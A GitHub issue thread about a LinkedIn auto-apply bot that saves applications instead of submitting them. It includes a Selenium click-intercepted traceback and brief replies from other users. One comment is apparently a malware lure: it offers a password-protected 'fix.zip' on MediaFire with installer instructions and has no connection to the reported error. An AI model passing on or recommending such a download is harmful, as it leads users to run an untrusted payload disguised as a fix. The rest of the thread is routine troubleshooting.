### ISSUE TITLE
Doesn't apply

### ISSUE THREAD

**Issue by sanjeethboddi** [feder-cr/linkedIn_auto_jobs_applier_with_AI#98]
Once the bot fills the form, it doesn't apply but saves the application. 

```
Traceback (most recent call last):
  File "/Users/sanjeeth/Self-Hosted-Apps/LinkedIn_AIHawk_automatic_job_application/src/linkedIn_easy_applier.py", line 63, in job_apply
    self._fill_application_form(job)
  File "/Users/sanjeeth/Self-Hosted-Apps/LinkedIn_AIHawk_automatic_job_application/src/linkedIn_easy_applier.py", line 130, in _fill_application_form
    if self._next_or_submit():
       ^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/sanjeeth/Self-Hosted-Apps/LinkedIn_AIHawk_automatic_job_application/src/linkedIn_easy_applier.py", line 143, in _next_or_submit
    next_button.click()
  File "/Users/sanjeeth/Self-Hosted-Apps/LinkedIn_AIHawk_automatic_job_application/venv/lib/python3.12/site-packages/selenium/webdriver/remote/webelement.py", line 94, in click
    self._execute(Command.CLICK_ELEMENT)
  File "/Users/sanjeeth/Self-Hosted-Apps/LinkedIn_AIHawk_automatic_job_application/venv/lib/python3.12/site-packages/selenium/webdriver/remote/webelement.py", line 403, in _execute
    return self._parent.execute(command, params)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/sanjeeth/Self-Hosted-Apps/LinkedIn_AIHawk_automatic_job_application/venv/lib/python3.12/site-packages/selenium/webdriver/remote/webdriver.py", line 440, in execute
    self.error_handler.check_response(response)
  File "/Users/sanjeeth/Self-Hosted-Apps/LinkedIn_AIHawk_automatic_job_application/venv/lib/python3.12/site-packages/selenium/webdriver/remote/errorhandler.py", line 245, in check_response
    raise exception_class(message, screen, stacktrace)
selenium.common.exceptions.ElementClickInterceptedException: Message: element click intercepted: Element <button aria-label="Review your application" id="ember358" class="artdeco-button artdeco-button--2 artdeco-button--primary ember-view" type="button">...</button> is not clickable at point (1023, 459). Other element would receive the click: <div data-test-modal-container="" data-test-modal-id="data-test-easy-apply-discard-confirmation" data-test-is-confirm-dialog="" aria-hidden="false" id="ember359" class="artdeco-modal-overlay artdeco-modal-overlay--layer-confirmation artdeco-modal-overlay--is-top-layer  ember-view">...</div>
  (Session info: chrome=128.0.6613.85)
Stacktrace:
0   chromedriver                        0x000000010323b9a8 cxxbridge1$str$ptr + 1887096
1   chromedriver                        0x0000000103233e10 cxxbridge1$str$ptr + 1855456
2   chromedriver                        0x0000000102e38be0 cxxbridge1$string$len + 89508
3   chromedriver                        0x0000000102e826fc cxxbridge1$string$len + 391360
4   chromedriver                        0x0000000102e80d28 cxxbridge1$string$len + 384748
5   chromedriver                        0x0000000102e7ef54 cxxbridge1$string$len + 377112
6   chromedriver                        0x0000000102e7e4a0 cxxbridge1$string$len + 374372
7   chromedriver                        0x0000000102e73930 cxxbridge1$string$len + 330484
8   chromedriver                        0x0000000102e733c0 cxxbridge1$string$len + 329092
9   chromedriver                        0x0000000102eb64a4 cxxbridge1$string$len + 603752
10  chromedriver                        0x0000000102e71a08 cxxbridge1$string$len + 322508
11  chromedriver                        0x0000000102e7266c cxxbridge1$string$len + 325680
12  chromedriver                        0x0000000103202068 cxxbridge1$str$ptr + 1651256
13  chromedriver                        0x000000010320699c cxxbridge1$str$ptr + 1669996
14  chromedriver                        0x00000001031e71fc cxxbridge1$str$ptr + 1541068
15  chromedriver                        0x000000010320726c cxxbridge1$str$ptr + 1672252
16  chromedriver                        0x00000001031d8810 cxxbridge1$str$ptr + 1481184
17  chromedriver                        0x0000000103225108 cxxbridge1$str$ptr + 1794776
18  chromedriver                        0x0000000103225284 cxxbridge1$str$ptr + 1795156
19  chromedriver                        0x0000000103233aac cxxbridge1$str$ptr + 1854588
20  libsystem_pthread.dylib             0x000000019f5f2f94 _pthread_start + 136
21  libsystem_pthread.dylib             0x000000019f5edd34 thread_start + 8

```

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by puneet-walia** [comment]
same for me

**Comment by azjz92** [comment]
Try V3 and let me know if it's still not working. A lot of patches are in there.
